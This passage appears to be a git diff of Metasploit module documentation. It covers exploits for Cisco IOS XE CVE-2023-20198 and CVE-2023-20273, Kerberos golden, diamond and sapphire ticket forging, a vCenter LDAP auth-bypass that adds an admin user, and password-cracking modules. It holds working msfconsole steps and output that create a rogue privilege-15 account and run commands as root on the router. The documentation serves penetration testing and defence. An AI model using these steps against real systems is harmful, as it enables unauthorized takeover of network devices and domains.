16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,
|
||||
16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,
|
||||
16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,
|
||||
16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,
|
||||
16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,
|
||||
16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,
|
||||
17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,
|
||||
17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,
|
||||
17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,
|
||||
17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,
|
||||
17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,
|
||||
17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,
|
||||
17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,
|
||||
17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,
|
||||
17.11.99SW
|
||||
|
||||
## Testing
|
||||
This module was tested against IOS XE version 16.12.3. To test this module you will need to either:
|
||||
|
||||
* Acquire a hardware device running one of the vulnerable firmware versions listed above.
|
||||
|
||||
Or
|
||||
|
||||
* Setup a virtualized environment.
|
||||
* A [CSR1000V](https://www.cisco.com/c/en/us/products/routers/cloud-services-router-1000v-series/index.html) device
|
||||
can be virtualized using [GNS3](https://www.gns3.com/) and VMWare Workstation/Player. Follow the
|
||||
[Windows setup guide](https://docs.gns3.com/docs/getting-started/installation/windows) to install GNS3 and the
|
||||
[topology guide](https://docs.gns3.com/docs/getting-started/your-first-gns3-topology) to learn how GNS3 can be used.
|
||||
* A suitable firmware image for testing would be `csr1000v-universalk9.16.12.03-serial.qcow2`.
|
||||
* When setting up GNS3, run the `GNS3 2.2.43` Virtual Machine for deploying QEMU based devices.
|
||||
* Create a new CSR1000v instance as a QEMU device.
|
||||
* The CSR1000v device's first ethernet adapter `Gi1` should be connected to a Cloud device, whose adapter was bridged
|
||||
to the physical adapter on the host machine, allowing an IP address to be assigned via DHCP, and allowing the Web UI to
|
||||
be accessible to a remote attacker.
|
||||
* When the virtual router has booted up, you must enable the vulnerable WebUI component. From a serial console on
|
||||
the device:
|
||||
```
|
||||
Router>enable
|
||||
Router#config
|
||||
Router(config)#ip http server
|
||||
router(config)#ip http secure-server
|
||||
router(config)#ip http authentication local
|
||||
router(config)#username admin privilege 15 secret qwerty
|
||||
router(config)#exit
|
||||
Router#copy running-config startup-config
|
||||
```
|
||||
* You should now be able to access the WebUI via https://TARGET_IP_ADDRESS/webui and login with admin:qwerty
|
||||
|
||||
## Verification Steps
|
||||
1. Start msfconsole
|
||||
2. `use auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198`
|
||||
3. `set RHOST <TARGET_IP_ADDRESS>`
|
||||
4. `set CMD "username hax0r privilege 15 secret hax0r"`
|
||||
5. `set MODE global`
|
||||
6. `run`
|
||||
7. Visit `https://<TARGET_IP_ADDRESS>/webui/` in a browser and log in with username `hax0r` and password `hax0r`.
|
||||
|
||||
## Options
|
||||
|
||||
### CMD
|
||||
|
||||
The Cisco CLI command to execute.
|
||||
|
||||
### MODE
|
||||
Cisco IOS commands cna be executed in one of several modes, specifically "User EXEC" mode, "Privileged EXEC" mode, and
|
||||
"Global Configuration" mode. The `MODE` options lets you explicitly set what mode you want the `CMD` to execute in. Valid
|
||||
modes are `user`, `privileged`, and `global`.
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf6 > use auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198
|
||||
msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set RHOST 192.168.86.57
|
||||
RHOST => 192.168.86.57
|
||||
msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set CMD "show version"
|
||||
CMD => show version
|
||||
msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set MODE privileged
|
||||
MODE => privileged
|
||||
msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > show options
|
||||
|
||||
Module options (auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CMD show version yes The CLI command to execute.
|
||||
MODE privileged yes The mode to execute the CLI command in, valid values are 'user', 'privileged', or 'global'.
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 192.168.86.57 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run
|
||||
[*] Running module against 192.168.86.57
|
||||
|
||||
|
||||
Cisco IOS XE Software, Version 16.12.03
|
||||
Cisco IOS Software [Gibraltar], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 16.12.3, RELEASE SOFTWARE (fc5)
|
||||
Technical Support: http://www.cisco.com/techsupport
|
||||
Copyright (c) 1986-2020 by Cisco Systems, Inc.
|
||||
Compiled Mon 09-Mar-20 21:50 by mcpre
|
||||
Cisco IOS-XE software, Copyright (c) 2005-2020 by cisco Systems, Inc.
|
||||
All rights reserved. Certain components of Cisco IOS-XE software are
|
||||
licensed under the GNU General Public License ("GPL") Version 2.0. The
|
||||
software code licensed under GPL Version 2.0 is free software that comes
|
||||
with ABSOLUTELY NO WARRANTY. You can redistribute and/or modify such
|
||||
GPL code under the terms of GPL Version 2.0. For more details, see the
|
||||
documentation or "License Notice" file accompanying the IOS-XE software,
|
||||
or the applicable URL provided on the flyer accompanying the IOS-XE
|
||||
software.
|
||||
ROM: IOS-XE ROMMON
|
||||
router uptime is 3 hours, 59 minutes
|
||||
Uptime for this control processor is 4 hours, 2 minutes
|
||||
System returned to ROM by reload
|
||||
System image file is "bootflash:packages.conf"
|
||||
Last reload reason: reload
|
||||
This product contains cryptographic features and is subject to United
|
||||
States and local country laws governing import, export, transfer and
|
||||
use. Delivery of Cisco cryptographic products does not imply
|
||||
third-party authority to import, export, distribute or use encryption.
|
||||
Importers, exporters, distributors and users are responsible for
|
||||
compliance with U.S. and local country laws. By using this product you
|
||||
agree to comply with applicable laws and regulations. If you are unable
|
||||
to comply with U.S. and local laws, return this product immediately.
|
||||
A summary of U.S. laws governing Cisco cryptographic products may be found at:
|
||||
http://www.cisco.com/wwl/export/crypto/tool/stqrg.html
|
||||
If you require further assistance please contact us by sending email to
|
||||
export@cisco.com.
|
||||
License Level: ax
|
||||
License Type: N/A(Smart License Enabled)
|
||||
Next reload license Level: ax
|
||||
Smart Licensing Status: UNREGISTERED/No Licenses in Use
|
||||
cisco CSR1000V (VXE) processor (revision VXE) with 1113574K/3075K bytes of memory.
|
||||
Processor board ID 9OVFUOGPESO
|
||||
4 Gigabit Ethernet interfaces
|
||||
32768K bytes of non-volatile configuration memory.
|
||||
3012164K bytes of physical memory.
|
||||
6188032K bytes of virtual hard disk at bootflash:.
|
||||
0K bytes of WebUI ODM Files at webui:.
|
||||
Configuration register is 0x2102
|
||||
|
||||
[*] Auxiliary module execution completed
|
||||
msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run CMD="show clock"
|
||||
[*] Running module against 192.168.86.57
|
||||
|
||||
|
||||
*15:24:05.110 UTC Fri Nov 3 2023
|
||||
[*] Auxiliary module execution completed
|
||||
msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) >
|
||||
```
|
||||
@@ -0,0 +1,130 @@
|
||||
## Vulnerable Application
|
||||
This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE
|
||||
devices which have the Web UI exposed. An attacker can execute arbitrary OS commands with root privileges.
|
||||
|
||||
This module leverages CVE-2023-20198 to create a new admin user, then authenticating as this user,
|
||||
CVE-2023-20273 is leveraged for OS command injection. The output of the command is written to a file and read
|
||||
back via the webserver. Finally the output file is deleted and the admin user is removed.
|
||||
|
||||
The vulnerable IOS XE versions are:
|
||||
|
||||
16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,
|
||||
16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,
|
||||
16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,
|
||||
16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,
|
||||
16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,
|
||||
16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,
|
||||
16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,
|
||||
16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,
|
||||
16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,
|
||||
16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,
|
||||
16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,
|
||||
16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,
|
||||
16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,
|
||||
17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,
|
||||
17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,
|
||||
17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,
|
||||
17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,
|
||||
17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,
|
||||
17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,
|
||||
17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,
|
||||
17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,
|
||||
17.11.99SW
|
||||
|
||||
## Testing
|
||||
This module was tested against IOS XE version 16.12.3. To test this module you will need to either:
|
||||
|
||||
* Acquire a hardware device running one of the vulnerable firmware versions listed above.
|
||||
|
||||
Or
|
||||
|
||||
* Setup a virtualized environment.
|
||||
* A [CSR1000V](https://www.cisco.com/c/en/us/products/routers/cloud-services-router-1000v-series/index.html) device
|
||||
can be virtualized using [GNS3](https://www.gns3.com/) and VMWare Workstation/Player. Follow the
|
||||
[Windows setup guide](https://docs.gns3.com/docs/getting-started/installation/windows) to install GNS3 and the
|
||||
[topology guide](https://docs.gns3.com/docs/getting-started/your-first-gns3-topology) to learn how GNS3 can be used.
|
||||
* A suitable firmware image for testing would be `csr1000v-universalk9.16.12.03-serial.qcow2`.
|
||||
* When setting up GNS3, run the `GNS3 2.2.43` Virtual Machine for deploying QEMU based devices.
|
||||
* Create a new CSR1000v instance as a QEMU device.
|
||||
* The CSR1000v device's first ethernet adapter `Gi1` should be connected to a Cloud device, whose adapter was bridged
|
||||
to the physical adapter on the host machine, allowing an IP address to be assigned via DHCP, and allowing the Web UI to
|
||||
be accessible to a remote attacker.
|
||||
* When the virtual router has booted up, you must enable the vulnerable WebUI component. From a serial console on
|
||||
the device:
|
||||
```
|
||||
Router>enable
|
||||
Router#config
|
||||
Router(config)#ip http server
|
||||
router(config)#ip http secure-server
|
||||
router(config)#ip http authentication local
|
||||
router(config)#username admin privilege 15 secret qwerty
|
||||
router(config)#exit
|
||||
Router#copy running-config startup-config
|
||||
```
|
||||
* You should now be able to access the WebUI via https://TARGET_IP_ADDRESS/webui and login with admin:qwerty
|
||||
|
||||
## Verification Steps
|
||||
1. Start msfconsole
|
||||
2. `use auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273`
|
||||
3. `set RHOST <TARGET_IP_ADDRESS>`
|
||||
4. `set CMD "id"`
|
||||
5. `run`
|
||||
|
||||
## Options
|
||||
|
||||
### CMD
|
||||
A Linux OS command to execute on the target device, e.g. `id`
|
||||
|
||||
### CISCO_ADMIN_USERNAME
|
||||
The username of an admin account. If not set, CVE-2023-20198 is leveraged to first create a new admin account and then
|
||||
the new account is then removed after the module completes.
|
||||
|
||||
### CISCO_ADMIN_PASSWORD
|
||||
The password of an admin account. If not set, CVE-2023-20198 is leveraged to create a new admin password.
|
||||
|
||||
### REMOVE_OUTPUT_TIMEOUT
|
||||
The maximum timeout (in seconds) to wait when trying to removing the commands output file. The output file
|
||||
can be locked preventing deleting upon the first attempt, so the module will try again if needed.
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > show options
|
||||
|
||||
Module options (auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CISCO_ADMIN_PASSWORD no The password of an admin account. If not set, CVE-2023-20198 is leveraged to c
|
||||
reate a new admin password.
|
||||
CISCO_ADMIN_USERNAME no The username of an admin account. If not set, CVE-2023-20198 is leveraged to c
|
||||
reate a new admin account.
|
||||
CMD id yes The OS command to execute.
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
REMOVE_OUTPUT_TIMEOUT 30 yes The maximum timeout (in seconds) to wait when trying to removing the commands
|
||||
output file.
|
||||
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
|
||||
cs/using-metasploit.html
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set rhosts 10.5.135.193
|
||||
rhosts => 10.5.135.193
|
||||
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set verbose true
|
||||
verbose => true
|
||||
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > run
|
||||
[*] Running module against 10.5.135.193
|
||||
|
||||
[*] Created privilege 15 user 'rfojGrqA' with password 'ixnXyFlw'
|
||||
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
|
||||
|
||||
[*] Removing output file '/var/www/fNrmuBOf'
|
||||
[*] Removing user 'rfojGrqA'
|
||||
[*] Auxiliary module execution completed
|
||||
|
||||
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) >
|
||||
```
|
||||
@@ -1,6 +1,6 @@
|
||||
## Kerberos Ticket Forging (Golden/Silver tickets)
|
||||
|
||||
The `auxiliary/admin/kerberos/forge_ticket` module allows the forging of a golden or silver ticket.
|
||||
The `auxiliary/admin/kerberos/forge_ticket` module allows the forging of a golden, silver, diamond or sapphire ticket.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
@@ -12,6 +12,8 @@ There are two kind of actions the module can run:
|
||||
|
||||
1. **FORGE_SILVER** - Forge a Silver ticket - forging a service ticket. [Default]
|
||||
2. **FORGE_GOLDEN** - Forge a Golden ticket - forging a ticket granting ticket.
|
||||
3. **FORGE_DIAMOND** - Forge a Diamond ticket - forging a ticket granting ticket by copying the PAC of another user.
|
||||
4. **FORGE_SAPPHIRE** - Forge a Golden ticket - forging a ticket granting ticket by copying the PAC of a particular user, using the S4U2Self+U2U trick.
|
||||
|
||||
## Pre-Verification steps
|
||||
|
||||
@@ -199,6 +201,39 @@ export KRB5CCNAME=/Users/user/.msf4/loot/20220901132003_default_192.168.123.13_k
|
||||
python3 $code/impacket/examples/smbexec.py 'adf3.local/Administrator@dc3.adf3.local' -dc-ip 192.168.123.13 -k -no-pass
|
||||
```
|
||||
|
||||
### Forging Diamond ticket
|
||||
|
||||
A diamond ticket is just a golden ticket (thus requiring knowledge of the krbtgt hash), with an attempt to be stealthier, by:
|
||||
|
||||
- Performing an AS-REQ request to retrieve a TGT for any user
|
||||
- Using the krbtgt hash to decrypt the real ticket
|
||||
- Setting properties of the forged PAC to mirror those in the valid TGT
|
||||
- Encrypting the forged ticket with the krbtgt hash
|
||||
|
||||
The primary requirement of a Diamond ticket is the same: knowledge of the krbtgt hash of the domain.
|
||||
The `DOMAIN_SID` property is not required, as this is retrieved from the valid TGT.
|
||||
|
||||
To perform the first step (retrieving the TGT), you must provide sufficient information to authenticate to the domain
|
||||
(i.e. `RHOST`, `USERNAME` and `PASSWORD`).
|
||||
|
||||
### Forging Sapphire ticket
|
||||
|
||||
A sapphire ticket is similar to a Diamond ticket, in that it retrieves a real TGT, and copies data from that PAC onto the forged ticket. However,
|
||||
instead of using the ticket retrieved in the initial authentication, an additional step is performed to retrieve a PAC for another (presumably
|
||||
high-privilege) user:
|
||||
|
||||
- Authenticating to the KDC
|
||||
- Using the S4U2Self and U2U extensions to request a TGS for a high-privilege user (this mirrors what the real user's PAC would look like, but the ticket is unusable in high-privilege contexts)
|
||||
- Decrypt this information
|
||||
- Setting properties of the forged PAC to mirror those in the valid TGT
|
||||
- Encrypting the forged ticket with the krbtgt hash
|
||||
|
||||
The primary requirement of a Sapphire ticket is the same as for Golden and Diamond tickets: knowledge of the krbtgt hash of the domain.
|
||||
The `DOMAIN_SID` and `DOMAIN_RID` properties are not required, as this is retrieved from the valid TGT.
|
||||
|
||||
To perform the first step (retrieving the TGT), you must provide sufficient information to authenticate to the domain
|
||||
(i.e. `RHOST`, `USERNAME` and `PASSWORD`).
|
||||
|
||||
### Common Mistakes
|
||||
|
||||
**Invalid hostname**
|
||||
|
||||
@@ -32,21 +32,21 @@ Add an admin user to the vCenter Server.
|
||||
If you already have the LDAP base DN, you may set it in this option.
|
||||
`dc=vsphere,dc=local` will be used if not set.
|
||||
|
||||
### BIND_DN
|
||||
### USERNAME
|
||||
|
||||
If you already have a password to authenticate to the LDAP server (see
|
||||
BIND_PW), this option let you setup the bind username in DN format (e.g
|
||||
USERNAME), this option let you setup the bind username in DN format (e.g
|
||||
`cn=1.2.3.4,ou=Domain Controllers,dc=vsphere,dc=local`).
|
||||
|
||||
### BIND_PW
|
||||
### PASSWORD
|
||||
|
||||
The password to authenticate to the LDAP server, if you have it.
|
||||
|
||||
### USERNAME
|
||||
### NEW_USERNAME
|
||||
|
||||
Set this to the username for the new admin user.
|
||||
|
||||
### PASSWORD
|
||||
### NEW_PASSWORD
|
||||
|
||||
Set this to the password for the new admin user.
|
||||
|
||||
@@ -63,11 +63,11 @@ Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
BASE_DN no LDAP base DN if you already have it
|
||||
PASSWORD no Password of admin user to add
|
||||
NEW_PASSWORD no Password of admin user to add
|
||||
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
|
||||
RPORT 636 yes The target port
|
||||
SSL true no Enable SSL on the LDAP connection
|
||||
USERNAME no Username of admin user to add
|
||||
NEW_USERNAME no Username of admin user to add
|
||||
|
||||
|
||||
Auxiliary action:
|
||||
@@ -79,10 +79,10 @@ Auxiliary action:
|
||||
|
||||
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set rhosts [redacted]
|
||||
rhosts => [redacted]
|
||||
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set username msfadmin
|
||||
username => msfadmin
|
||||
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set password msfadmin
|
||||
password => msfadmin
|
||||
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set new_username msfadmin
|
||||
new_username => msfadmin
|
||||
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set new_password msfadmin
|
||||
new_password => msfadmin
|
||||
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > run
|
||||
[*] Running module against [redacted]
|
||||
not verifying SSL hostname of LDAPS server '[redacted]:636'
|
||||
@@ -140,15 +140,15 @@ Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
BASE_DN dc=vsphere,dc=local no LDAP base DN if you already have it
|
||||
BIND_DN cn=192.168.3.32,ou=Domain Controlle no The username to authenticate to LDAP server
|
||||
USERNAME cn=192.168.3.32,ou=Domain Controlle no The username to authenticate to LDAP server
|
||||
rs,dc=vsphere,dc=local
|
||||
BIND_PW #$F4!4SeV\BL~L2gb(oa no Password for the BIND_DN
|
||||
PASSWORD NewPassword123# no Password of admin user to add
|
||||
PASSWORD #$F4!4SeV\BL~L2gb(oa no Password for the BIND_DN
|
||||
NEW_PASSWORD NewPassword123# no Password of admin user to add
|
||||
RHOSTS 192.168.3.32 yes The target host(s), see https://github.com/rapid7/metasploit-framework
|
||||
/wiki/Using-Metasploit
|
||||
RPORT 636 yes The target port
|
||||
SSL true no Enable SSL on the LDAP connection
|
||||
USERNAME MsfAdmin no Username of admin user to add
|
||||
NEW_USERNAME MsfAdmin no Username of admin user to add
|
||||
|
||||
|
||||
Auxiliary action:
|
||||
|
||||
@@ -11,28 +11,36 @@
|
||||
4. Do: ```run```
|
||||
5. You should hopefully crack a password.
|
||||
|
||||
## Actions
|
||||
|
||||
### john
|
||||
|
||||
Use john the ripper (default).
|
||||
|
||||
### hashcat
|
||||
|
||||
Use hashcat.
|
||||
|
||||
## Options
|
||||
|
||||
### CONFIG
|
||||
|
||||
**CONFIG**
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
### JOHN_PATH
|
||||
|
||||
**JOHN_PATH**
|
||||
The absolute path to the John the Ripper executable. Default behavior is to search `path` for `john` and `john.exe`.
|
||||
|
||||
The absolute path to the John the Ripper executable. Default behavior is to search `path` for
|
||||
`john` and `john.exe`.
|
||||
### POT
|
||||
|
||||
**POT**
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
### DeleteTempFiles
|
||||
|
||||
**DeleteTempFiles**
|
||||
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
|
||||
## Scenarios
|
||||
|
||||
|
||||
@@ -8,7 +8,7 @@
|
||||
Formats:
|
||||
|
||||
| Common | John | Hashcat |
|
||||
|--------| ---------|---------|
|
||||
| ------ | -------- | ------- |
|
||||
| des | descript | 1500 |
|
||||
|
||||
Sources of hashes can be found here:
|
||||
@@ -25,55 +25,54 @@
|
||||
|
||||
## Actions
|
||||
|
||||
**john**
|
||||
### john
|
||||
|
||||
Use john the ripper (default).
|
||||
Use john the ripper (default).
|
||||
|
||||
**hashcat**
|
||||
### hashcat
|
||||
|
||||
Use hashcat.
|
||||
Use hashcat.
|
||||
|
||||
## Options
|
||||
|
||||
### CONFIG
|
||||
|
||||
**CONFIG**
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
### CRACKER_PATH
|
||||
|
||||
**CRACKER_PATH**
|
||||
The absolute path to the cracker executable. Default behavior is to search `path`.
|
||||
|
||||
The absolute path to the cracker executable. Default behavior is to search `path`.
|
||||
### CUSTOM_WORDLIST
|
||||
|
||||
**CUSTOM_WORDLIST**
|
||||
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
|
||||
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
|
||||
|
||||
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
|
||||
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
|
||||
### DeleteTempFiles
|
||||
|
||||
**DeleteTempFiles**
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
### Fork
|
||||
|
||||
**Fork**
|
||||
This option will set how many forks to use on john the ripper. Default is `1` (no forking).
|
||||
|
||||
This option will set how many forks to use on john the ripper. Default is `1` (no forking).
|
||||
### INCREMENTAL
|
||||
|
||||
**INCREMENTAL**
|
||||
Run the cracker in incremental mode. Default is `true`
|
||||
|
||||
Run the cracker in incremental mode. Default is `true`
|
||||
### ITERATION_TIMEOUT
|
||||
|
||||
**ITERATION_TIMEOUT**
|
||||
The max-run-time for each iteration of cracking
|
||||
|
||||
The max-run-time for each iteration of cracking
|
||||
### KORELOGIC
|
||||
|
||||
**KORELOGIC**
|
||||
Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
|
||||
Default is `false`.
|
||||
|
||||
Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
|
||||
Default is `false`.
|
||||
### MUTATE
|
||||
|
||||
**MUTATE**
|
||||
|
||||
Apply common mutations to the Wordlist (SLOW). Mutations are:
|
||||
Apply common mutations to the Wordlist (SLOW). Mutations are:
|
||||
|
||||
* `'@' => 'a'`
|
||||
* `'0' => 'o'`
|
||||
@@ -83,44 +82,44 @@
|
||||
* `'1' => 'l'`
|
||||
* `'5' => 's'`
|
||||
|
||||
Default is `false`.
|
||||
Default is `false`.
|
||||
|
||||
**POT**
|
||||
### POT
|
||||
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
|
||||
**SHOWCOMMAND**
|
||||
### SHOWCOMMAND
|
||||
|
||||
Show the command being used run from the command line for debugging. Default is `false`
|
||||
Show the command being used run from the command line for debugging. Default is `false`
|
||||
|
||||
**USE_CREDS**
|
||||
### USE_CREDS
|
||||
|
||||
Use existing credential data saved in the database. Default is `true`.
|
||||
Use existing credential data saved in the database. Default is `true`.
